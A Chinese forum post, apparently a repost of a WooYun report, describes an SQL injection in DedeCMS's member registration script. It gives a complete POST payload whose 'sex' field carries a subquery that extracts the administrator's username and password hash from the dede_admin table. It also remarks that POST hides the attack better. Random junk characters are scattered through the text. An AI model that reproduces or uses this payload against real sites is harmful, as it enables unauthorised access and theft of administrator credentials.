找回密码
 立即注册
查看: 2509|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞
$ `* U& {. s" X% _: q简要描述:$ t; W; O& i/ T

0 z- s3 Y+ r: q6 j& v) t需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
5 f9 J  o  @+ r9 ]: c2 Z# n原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码./ y, J& q9 S; @8 c3 L+ V
详细说明:跟这个漏洞
7 W! Q* p- V% L4 @( T! O! ^ # V; @7 o; @! g% f$ \
WooYun: Dedecms SQL注射导致审核机制绕过漏洞5 f3 X; I- n6 `& S! S
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.- ^' r9 W6 }! G- S. R
POST提交以下数据,其实不用POST提交的,这样隐蔽点.
; g5 i2 \. k' `1 S* a
6 }, p/ G% M* Y$ f  t% ?www.political-security.com/member/reg_new.php
8 Z5 H  Z/ O2 R7 ^
, [8 i1 a$ H2 e. }- MPOST8 ]# ^4 q. d. ^

) u* }% o2 m3 R, |- _dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
* J- t+ e% r+ S6 R7 v2 E0 I9 Quserid=c4rp3nt3r&uname=c4rp3nt3r
  H4 L; `% d( T8 v3 x* m; H0 ^&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss/ z8 }( M# }! p: w( D
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
" X, i8 T% S- g) D6 v+ ~2 i(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
) L- h/ x) i  Z0 l8 f%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表